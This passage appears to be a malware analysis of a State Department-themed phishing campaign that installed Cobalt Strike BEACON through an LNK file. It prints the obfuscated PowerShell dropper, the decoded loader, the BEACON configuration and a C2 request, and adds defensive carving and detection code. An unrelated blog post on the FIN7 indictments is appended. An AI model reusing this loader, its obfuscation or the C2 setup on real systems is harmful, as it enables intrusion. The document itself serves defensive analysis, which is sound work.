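    local, sender_domain = addr.rpartition("@")[0], domain_of(addr)
    findings = []

    # 1. A local-part this long is invalid per RFC 5321 and was likely chosen to push the
    #    real domain out of view in mail clients that truncate the sender.
    if len(local) > MAX_LOCAL_PART:
        findings.append(f"local-part is {len(local)} chars, RFC 5321 allows {MAX_LOCAL_PART}")

    # 2. Display name, subject or body invokes the impersonated organisation, but the
    #    sending domain belongs to someone else.
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    visible = " ".join([name, str(msg.get("Subject", "")), text]).lower()
    if impersonated.lower() in visible and sender_domain not in impersonated_domains:
        findings.append(f"lure invokes {impersonated} but From domain is {sender_domain}")

    # 3. Return-Path and From disagree on the sending domain.
    rp_domain = domain_of(parseaddr(str(msg.get("Return-Path", "")))[1])
    if rp_domain and rp_domain != sender_domain:
        findings.append(f"Return-Path domain {rp_domain} differs from From domain {sender_domain}")

    # 4. Links point at a third host; an impersonated-org token buried in the path is a
    #    classic sign of a compromised legitimate site being used for hosting.
    for url in URL_RX.findall(text):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if host and host != sender_domain and host not in impersonated_domains:
            hint = any(d.replace(".", "_") in parts.path.lower() for d in impersonated_domains)
            findings.append(f"link hosted on {host}" + (" with impersonated org in the path" if hint else ""))
    return findings


# Constructed message: reported sender and subject, everything else made up for the example.
SAMPLE = (
    'From: "Stevenson, Susan N" <DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa5034'
    "2836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm.org>\n"
    "Return-Path: <bounce@northshorehealthgm.org>\n"
    "To: recipient@example.org\n"
    'Subject: Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you\n'
    "Content-Type: text/plain; charset=us-ascii\n"
    "\n"
    "Susan Stevenson, U.S. Department of State, shared a document with you:\n"
    "https://www.jmj.com/personal/nauerthn_state_gov/\n")

# Constructed benign message for comparison.
CLEAN = (
    "From: Alice <alice@example.org>\nTo: bob@example.org\nSubject: lunch menu\n"
    "Content-Type: text/plain; charset=us-ascii\n\nMenu is at https://example.org/menu\n")

if __name__ == "__main__":
    for finding in triage(SAMPLE, "Department of State", {"state.gov"}):
        print("-", finding)
```

The 64-octet local-part limit comes from RFC 5321; a message that violates it was hand-crafted rather than produced by a normal mail system, which is a useful pivot on its own. The impersonation check keys on a phrase supplied by the analyst and on the organisation's real sending domains, so it generalises beyond this campaign.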

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

| Time | Event | Source |
| --- | --- | --- |
| 2018-10-15 15:35:19Z | pandorasong[.]com registered | Registrant Information |
| 2018-10-15 17:39:00Z | pandorasong[.]com SSL certificate established | Certificate Transparency |
| 2018-10-15 18:52:06Z | Cobalt Strike server established | Scan Data |
| 2018-11-02 10:25:58Z | LNK weaponized | LNK Metadata |
| 2018-11-13 17:58:41Z | 3fccf531ff0ae6fedd7c586774b17a2d modified | Archive Metadata |
| 2018-11-14 01:48:34Z | 658c6fe38f95995fa8dc8f6cfe41df7b modified | Archive Metadata |
| 2018-11-14 08:23:10Z | First observed phishing e-mail sent | Telemetry |

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, likely intended to defeat detection logic keyed on literal strings. For example, 'FromBase'+0x40+'String' is concatenated at run time into FromBase64String (0x40 is 64), the .NET [Convert] method used to decode base64, so the method name never appears as a literal in the command line; the method is then called through a variable, [Convert]::$fz.Invoke($zk), rather than as [Convert]::FromBase64String($zk).

The decoded command consisted of additional PowerShell that located ds7002.lnk (searching %TEMP% recursively if it was not in the current directory), read its content from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;                       # start offset of the base64 stage inside ds7002.lnk
$vcq=0x000623b6;                        # end offset
$tb="ds7002.lnk";
if (-not(Test-Path $tb))                # not in the working directory: search %TEMP% for the LNK
{
    $oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
    if (-not $oe)
    {
        exit                            # cannot find itself: bail out silently
    }
    [IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);      # 0x40f8 bytes of base64 text
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;                                # run the decoded loader

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK (the PDF from 0x48bd8 to 0x5e2be, the DLL from 0xdd8 to 0x48bd8), decoded, and written to disk. Two details matter for detection: the argument to Invoke-Item is an integer array XOR-decoded at run time with key 35, which yields the variable name $lblij (the path of the dropped PDF), and the BEACON loader DLL is executed through rundll32.exe with the export function "PointFunctionCall" only when PROCESSOR_ARCHITECTURE is AMD64, so on a 32-bit host only the decoy is opened:

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF")
Invoke-Item $((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat")
if ($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",") $("PointFunctionCall") }
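The layout the loader relies on (shortcut structure, then the DLL, the PDF and the base64 second stage at fixed offsets) can be carved back out of the file without running any of it. The following is an added example, not FireEye's code: it slices ds7002.lnk using the offsets hard-coded in the decoded loader above, hashes each payload for comparison with the indicator table, reverses the integer-array XOR string trick (the Invoke-Item argument decodes with key 35 to the variable name $lblij), and flags the first-stage command-line tricks a detection engineer would alert on. The LNK bytes it carves are a constructed stand-in with the same offsets and dummy contents, not the real sample.

```python
"""Carve the payloads out of a self-reading LNK loader and flag its first-stage tricks.

Added example (not FireEye's code): the region offsets are the ones the decoded
loader above hard-codes for ds7002.lnk; the LNK bytes built here are a constructed
stand-in with the same layout and dummy payloads, not the real sample."""
import base64
import hashlib
import re

# (start, end) offsets into ds7002.lnk, lifted from the decoded loader. The first
# 0xdd8 bytes are the genuine shortcut structure that Explorer parses.
REGIONS = {
    "beacon_dll": (0x0DD8, 0x48BD8),   # written to %LOCALAPPDATA%\cyzfc.dat
    "decoy_pdf": (0x48BD8, 0x5E2BE),   # written to %TEMP%\ds7002.PDF
    "stage2_b64": (0x5E2BE, 0x623B6),  # base64 text of the second PowerShell stage
}


def carve(lnk: bytes, regions=REGIONS):
    """Slice every region out of the file; *_b64 regions are base64-decoded.
    Returns {name: (payload_bytes, md5_hex)} so the hashes can be matched to the IOC table."""
    out = {}
    for name, (start, end) in regions.items():
        if end > len(lnk):
            raise ValueError(f"{name}: {start:#x}-{end:#x} runs past end of file ({len(lnk):#x})")
        blob = lnk[start:end]
        if name.endswith("_b64"):
            # the loader feeds this exact span to FromBase64CharArray; tolerate NUL padding
            blob = base64.b64decode(blob.rstrip(b"\x00"), validate=True)
        out[name] = (blob, hashlib.md5(blob).hexdigest())
    return out


def xor_decode(values, key):
    """Reverse the integer-array string obfuscation used on the Invoke-Item line."""
    return "".join(chr(v ^ key) for v in values)


# Signals worth alerting on in the first-stage command line (see the powershell.exe invocation above).
OBFUSCATION_PATTERNS = {
    "execution policy bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "non-interactive flag": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "FromBase64String built by concatenation": re.compile(
        r"""['"]FromBase['"]\s*\+\s*(?:0x40|64)\s*\+\s*['"]String['"]""", re.I),
    "method name held in a variable": re.compile(r"\[Convert\]::\$\w+\.Invoke\(", re.I),
    "iex on a variable": re.compile(r"\biex\s+\$\w+", re.I),
}


def flag_powershell(cmdline: str):
    """Names of every obfuscation signal present in a PowerShell command line."""
    return [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(cmdline)]


# Tail of the real first-stage command line; the long base64 literal is elided with '...'.
FIRST_STAGE = ("powershell.exe -noni -ep bypass $zk='...';$fz='FromBase'+0x40+'String';"
               "$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;")


def build_sample_lnk() -> bytes:
    """Constructed stand-in for ds7002.lnk: same region layout, dummy contents."""
    dll_len = REGIONS["beacon_dll"][1] - REGIONS["beacon_dll"][0]
    pdf_len = REGIONS["decoy_pdf"][1] - REGIONS["decoy_pdf"][0]
    b64_len = REGIONS["stage2_b64"][1] - REGIONS["stage2_b64"][0]  # 0x40f8, a multiple of 4
    header = b"L\x00\x00\x00".ljust(REGIONS["beacon_dll"][0], b"\x00")  # HeaderSize 0x4c, as in a real LNK
    dll = b"MZ".ljust(dll_len, b"\x00")
    pdf = b"%PDF-1.4 constructed decoy".ljust(pdf_len, b"\x00")
    stage2 = b"# constructed second stage\n".ljust(b64_len * 3 // 4, b" ")  # encodes without '='
    return header + dll + pdf + base64.b64encode(stage2)


if __name__ == "__main__":
    for name, (payload, md5) in carve(build_sample_lnk()).items():
        print(f"{name:11s} {len(payload):7d} bytes md5={md5} head={payload[:10]!r}")
    print("Invoke-Item argument decodes to:",
          xor_decode([7, 30 + 0x34 - 3, 65, 84 - 5, -38 + 112, -16 + 0x25 + 52], 35))
    print("first-stage signals:", flag_powershell(FIRST_STAGE))
```

Run against the real ds7002.lnk, the three MD5s from carve() should line up with the BEACON DLL and decoy PDF entries in Table 2; on any other self-reading LNK the offsets have to be recovered first from its own decoded stage, which is exactly the step shown above.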

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %LOCALAPPDATA%\cyzfc.dat, i.e. AppData\Local (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong[.]com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications; the specific profile appears to be a modified version of the publicly available Pandora profile, probably changed to bypass common detections written against the public profiles. Because the channel is TLS, the request below is only visible at a TLS-inspecting proxy or on the host; on the wire, defenders see the TLS session to pandorasong[.]com and a beaconing cadence set by the configured beacon_interval (300) with 17% jitter. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong[.]com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache
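Where the decrypted request is visible, the modified profile leaves several fixed tells: the /access/ GET with version, lid and token parameters, the /radio/xmlrpc/v45 POST with text/xml and XMLHttpRequest headers, a DLNA header no browser sends, and a hard-coded __utma cookie whose visit timestamps run backwards. The following is an added example of a check over such requests, not FireEye's or Cobalt Strike's code. The three requests are constructed (the token is made up, not the one captured); treating the token as Cobalt Strike's netbios transform (two a..p letters per byte) is my inference from its alphabet rather than something the report states.

```python
"""Host- or proxy-side check for the modified Pandora malleable C2 profile.

Added example, not FireEye's or Cobalt Strike's code. The URIs, headers and cookie
come from the BEACON configuration and sample request above; the three requests
below are constructed, with a made-up token rather than the real one. Treating the
token as Cobalt Strike's 'netbios' transform (two a..p letters per byte) is my
inference from its alphabet, not something the report states."""
import re
from urllib.parse import parse_qs, urlsplit

C2_HOST = "pandorasong.com"
GET_PATH, POST_PATH = "/access/", "/radio/xmlrpc/v45"
NETBIOS_RX = re.compile(r"^[a-p]+$")
UTMA_RX = re.compile(r"__utma=(\d+)\.(\d+)\.(\d+)\.(\d+)\.(\d+)\.(\d+)")


def parse_request(raw: str):
    """Return (method, request-target, {lower-cased header name: value}) for one raw HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def netbios_decode(token: str) -> bytes:
    """Undo the a..p nibble encoding. The result is the RSA-encrypted session metadata,
    so it is opaque without the team server's key; decoding only confirms the format."""
    if len(token) % 2 or not NETBIOS_RX.match(token):
        raise ValueError("token is not netbios-encoded")
    return bytes(((ord(hi) - 0x61) << 4) | (ord(lo) - 0x61) for hi, lo in zip(token[::2], token[1::2]))


def beacon_indicators(raw: str):
    """Profile-specific traits found in one request; an empty list means nothing matched."""
    method, target, h = parse_request(raw)
    url, hits = urlsplit(target), []
    q = parse_qs(url.query)
    if h.get("host") == C2_HOST:
        hits.append("Host is the known BEACON C2")
    if method == "GET" and url.path == GET_PATH and {"version", "lid", "token"} <= set(q):
        hits.append("GET matches profile URI and parameter set")
        token = q["token"][0]
        if len(token) >= 128 and len(token) % 2 == 0 and NETBIOS_RX.match(token):
            hits.append("token is a long a..p blob (netbios-transformed metadata)")
    if (method == "POST" and url.path == POST_PATH
            and h.get("content-type") == "text/xml" and h.get("x-requested-with") == "XMLHttpRequest"):
        hits.append("POST matches profile URI and headers")
    if h.get("getcontentfeatures.dlna.org") == "1":
        hits.append("DLNA header on a browser-style request")
    m = UTMA_RX.search(h.get("cookie", ""))
    if m:
        # a real Google Analytics __utma carries first/previous/current visit timestamps in order
        first, prev, cur = (int(m.group(i)) for i in (3, 4, 5))
        if not first <= prev <= cur:
            hits.append("__utma visit timestamps out of order (hard-coded profile cookie)")
    return hits


def is_beacon(raw: str) -> bool:
    """Alert on the known host, or on two independent profile traits lining up."""
    hits = beacon_indicators(raw)
    return "Host is the known BEACON C2" in hits or len(hits) >= 2


# Constructed samples (CRLF-terminated, as they would appear in a proxy or TLS-inspection log).
TOKEN = "".join("abcdefghijklmnop"[i % 16] for i in range(160))  # made-up token, right alphabet
BEACON_GET = (
    f"GET /access/?version=4&lid=1582502724&token={TOKEN} HTTP/1.1\r\n"
    "Accept: */*\r\nGetContentFeatures.DLNA.ORG: 1\r\nHost: pandorasong.com\r\n"
    "Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n")
BEACON_POST = (
    "POST /radio/xmlrpc/v45 HTTP/1.1\r\nAccept: */*\r\nContent-Type: text/xml\r\n"
    "X-Requested-With: XMLHttpRequest\r\nHost: pandorasong.com\r\nContent-Length: 0\r\n\r\n")
# Same path and parameter names on an unrelated host, with a sane GA cookie: one weak hit only.
BENIGN_GET = (
    "GET /access/?version=4&lid=1&token=abc123 HTTP/1.1\r\nHost: www.example.com\r\n"
    "Cookie: __utma=1.2.1385202498.1403204372.1433201462.7;\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("beacon GET", BEACON_GET), ("beacon POST", BEACON_POST), ("benign GET", BENIGN_GET)):
        print(f"{label}: {is_beacon(req)} {beacon_indicators(req)}")
```

The host match is sufficient on its own; the other traits are scored so the logic keeps working when the same profile is reused with a fresh domain. Matching the __utma cookie value verbatim is the weakest option, since a regenerated profile changes it; the timestamp-order check survives that.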

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

| Indicator | Description |
| --- | --- |
| dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org | Phishing email address from likely compromised legitimate server |
| Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you | Phishing email subject |
| https://www.jmj[.]com/personal/nauerthn_state_gov/* | Malware hosting location on likely compromised legitimate domain |
| pandorasong[.]com | BEACON C2 |
| 95.216.59[.]92 | Resolution of pandorasong[.]com |
| 2b13b244aafe1ecace61ea1119a1b2ee | SSL certificate for pandorasong[.]com |
| 3fccf531ff0ae6fedd7c586774b17a2d | Malicious ZIP archive MD5 |
| 658c6fe38f95995fa8dc8f6cfe41df7b | Benign ZIP archive MD5 |
| 6ed0020b0851fb71d5b0076f4ee95f3c | Malicious LNK file MD5 |
| 313f4808aa2a2073005d219bc68971cd | Benign decoy PDF MD5 |
| 16bbc967a8b6a365871a05c74a4f345b | BEACON DLL MD5 |
| %LOCALAPPDATA%\cyzfc.dat | BEACON DLL file path |
| %TEMP%\ds7002.PDF | Benign decoy PDF file path |

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

| Product | Detection names |
| --- | --- |
| Network Security | Malware.Archive; Malware.Binary.lnk; Suspicious.Backdoor.Beacon |
| Endpoint Security | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY); Generic.mg.16bbc967a8b6a365 |
| Threat Analytics Platform | WINDOWS METHODOLOGY [PowerShell Base64 String]; WINDOWS METHODOLOGY [Rundll32 Roaming]; WINDOWS METHODOLOGY [PowerShell Script Block Warning]; WINDOWS METHODOLOGY [Base64 Char Args]; TADPOLE DOWNLOADER [Rundll Args]; INTEL HIT - IP [Structured Threat Reputation-Based]; INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]; INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]; INTEL HIT - FILE HASH [Structured Threat Reputation-Based] |

Table 3: FireEye product detections

Fin7 and the Perfect Phish

For the past twenty years, one of the main pieces of advice our industry gave to people regarding their email was "don't open attachments from people you don't know."  But what if your JOB is opening attachments from people you don't know?

On August 1st, the US Attorney for the Western District of Washington, Annette Hayes, and the FBI Seattle Special Agent in Charge, Jay Tabb, along with Deputy Assistant Attorney General Downing of main Justice's Computer Crime and Intellectual Property Section (CCIPS), gave a fascinating press conference about the FIN7 or Carbanak Group case.  (The link shows the 31 minute press conference on YouTube, where closed captioning is available.)

As Downing explained it, the FIN7 group would use a combination of emails and telephone calls to encourage people involved in catering or group reservations to open their malicious emails.  Imagine that your job is booking hotel rooms for group travel, or handling large catering deliveries for business meetings from your restaurant.  A new potential customer calls and says "I'd like to book forty hotel rooms for our sports team that is coming to play in a tournament in your town next month.  What email should I send the details to?"  Or "We're having an event at my office and need to order lunch for sixty people.  I know that I could use the online order form, but would you mind if I just sent you an email with the details?"  (I've done the latter myself when ordering FIFTY pizzas from Dominos!)

What sales person is NOT GOING TO OPEN THAT ATTACHMENT?  Right.  Every single one will do so!  Here's the flow of the attack that was shared at the Press Conference:

Depiction of one of the schemes used by cybercrime group FIN7.
(Image from FBI Seattle FBI Office)
Although the schemes I suggested sound complex, some of the emails shared during the press conference were quite simple:

Spear-phishing Email Image from justice.gov

Spear-phishing Email Image from justice.gov


Three criminals were arrested in this scheme, each on their own indictment.  The first two were actually arrested in January 2018, but their arrest and information about their case remained secret as law enforcement continued to hunt for additional members of the FIN7 team.

Also appearing at the press conference were representatives from Visa and MasterCard: Marie Russo, SVP of Cards and Franchise at MasterCard, and Dan Schott, Senior Director at Visa. Russo praised MasterCard's participation in the NCFTA (the National Cyber-Forensics and Training Alliance), which offers a service that helps send stolen credit card information to the …  Both Ms. Russo and Mr. Schott talked about their proactive means of identifying crime trends and coordinating with banks.  Mr. Schott reminded the audience that every Visa card service in the United States offers "Transaction Alerts" that will notify you when your card is used in a transaction.  (Unfortunately Schott also quoted the mythical $600 billion annual cost of cybercrime.)

Is This Joker's Stash?

We don't know.  Although many of the victim companies have been anonymized, the indictment does reveal that "Victim-1" was the Emerald Queen Hotel and Casino (EQC) in Pierce County, Washington, "Victim-3" was Chipotle Mexican Grill, Victim-5 was the Boeing Employee Credit Union, Victim-6 was Jason's Deli, Victim-8 was Red Robin Gourmet Burgers and Brews, Victim-9 was Sonic Drive-In, and Victim-10 was Taco John's.  Trend Micro has previously published that FIN7 was also involved in breaches at Trump Hotels, Whole Foods, Saks Fifth Avenue and Lord & Taylor.  That latter group of cards is known to have been trafficked on the criminal card market "Joker's Stash", and Trend Micro actually equates the groups.  Their April 2, 2018 press release, "Bank Card Data of Five Million Stolen in Saks and Lord & Taylor Data Breach," begins with the sentence:  "A hacking syndicate known as JokerStash (also identified as Fin7 and Carbanak) announced the sale of five million payment cards on the dark web last March 28."

Trend Micro (click for full article)
Brian Krebs is one of the journalists who have written extensively about Joker's Stash.  In his blog post "Will the Real Joker's Stash Come Forward", he shares an image of the card "base" "FIRETIGERRR" associated with the Sonic Drive-In data breach: a screenshot of the September 26, 2017 announcement on Joker's Stash about the availability of 5 million credit cards:

Sonic Drive-In cards being sold on Joker's Stash (image from krebsonsecurity.com)

The indictments do not make the ties between FIN7 and Joker's Stash quite so strongly.  For example, in the Hladyr indictment:

"between approximately March 24, 2017 and April 18, 2017, FIN7 harvested payment data from point-of-sale devices at certain Victim-3 restaurant locations.  FIN7 stole millions of payment card numbers, many of which have been offered for sale through vending sites, including but not limited to, Joker's Stash, thereby attempting to generate millions of dollars of illicit profits."

Three Ukrainian masterminds arrested

Three Ukrainians, Fedor Gladyr (age 33; the indictment spells the name Fedir Hladyr), Andrey Kolpakov (age 30), and Dmytro Fedorov (age 44) were arrested in the current round of actions, although prosecutors made it clear that there will be more arrests in the future.  They also made clear that the top leader of this scheme has not yet been arrested.

Fedorov is said to have been the first to be arrested, in January 2018, in Poland.  A KyivPost article in February about a 44-year old Ukrainian hacker being detained in Poland on an Interpol warrant is certainly about him ==> "Ukrainian Hacker detained, Faces 30 years in Prison."  

It is unknown how or if this is related to the Spanish Police arrest of "Denis-K", said at the time to be the leader of the Carbanak Group, on March 26, 2018 in Alicante, Spain.  (A YouTube video about that arrest, in Spanish, is available as "Detenido hacker 1000 millones (Denis-K)".)  The Times of London called Denis-K a 30-year-old Russian-born Ukrainian citizen, living in Spain, whose malware was used in cyber attacks in more than 40 countries, and who owned two million-dollar houses.  At the time, Europol said this was the end of a 5-year cybercrime spree that had stolen $1.2 billion.  This does NOT seem to be the same person, despite the age match and the "K" surname, as the US case states that Kolpakov was arrested in "late June" in Lepe, Spain.

It is also unknown how or if this is related to the Ukrainian Police's arrest of members of the COBALT gang earlier this year.  Europol says that COBALT and CARBANAK are the same group.  It is believed by this author that the current FBI action in Seattle is targeting CUSTOMERS of the malware author group known as Cobalt/Carbanak.  Hopefully this will get sorted out in the near future.

The superseding indictment of Fedor Gladyr
Fedor Gladyr, aka das, aka Fyodor, aka AronaXus, "served as a high-level systems administrator for FIN7 who maintained servers and communications channels used by the organization.  For example, FIN7 members requested Gladyr grant them access to servers used by FIN7 to facilitate the malware scheme."  He also played a management role in the scheme by delegating tasks and by providing instruction to other members of the scheme.  Gladyr used Jabber and HipChat to communicate with his teams.  The team used a JIRA server, usually used to track long software development projects, to communicate about the infiltration of their victims.  As a few examples:

07SEP2016 - Gladyr opens an "issue" for Victim-6 for his conspirators to upload files of internal credentials for the company network.
JAN2017 - Dmytro Fedorov opens an "issue" for Victim-7 credentials to be posted.
05APR2017 - Fedorov opens an "issue" for Victim-9 credentials to be posted.

Some of the malicious infiltration of the victim networks came by emailing those malware-laden requests for quotes to companies.  Some examples include:

08AUG2016 - Victim-1, email from just_etravel@yahoo.com
08AUG2016 - Victim-1, email from frankjohnson@revital-travel.com
25AUG2016 - Victim-6, email from revital.travel@yahoo.com 
21&23FEB2017 - Victim-2 two emails
24-25MAR2017 - Victim-3 six emails 
05APR2017 - Victim-9 emails from oliver_palmer@yahoo.com 
11APR2017 - Victim-4 email from oliver_palmer@yahoo.com 
10MAR2017 - Victim-5 email 
27MAR2017 - Victim-8 email from ray.donovan84@yahoo.com 
25MAY2017 - Victim-4 email from Adrian.1987clark@yahoo.com (Subject: "takeout order")
12JUN2017 - Victim-10 email from Adrian.1987clark@yahoo.com (Attachment: order.catering.rtf)

In the case of Victim-1, firewall logs indicate that between August 8,  2016 and August 31, 2016, there were at least 3,639 communications between their organization and "revital-travel.com" addresses hosted on an IP address in Russia.

Not all of the emails were the "customer wanting a quote" type.  On 21FEB2017, pen-testers working for the scheme sent emails purporting to be from filings@sec.gov to Victim-2.  The email contained a Microsoft Word attachment and alleged that an important filing was due and that the details for the filing were in the attached document.

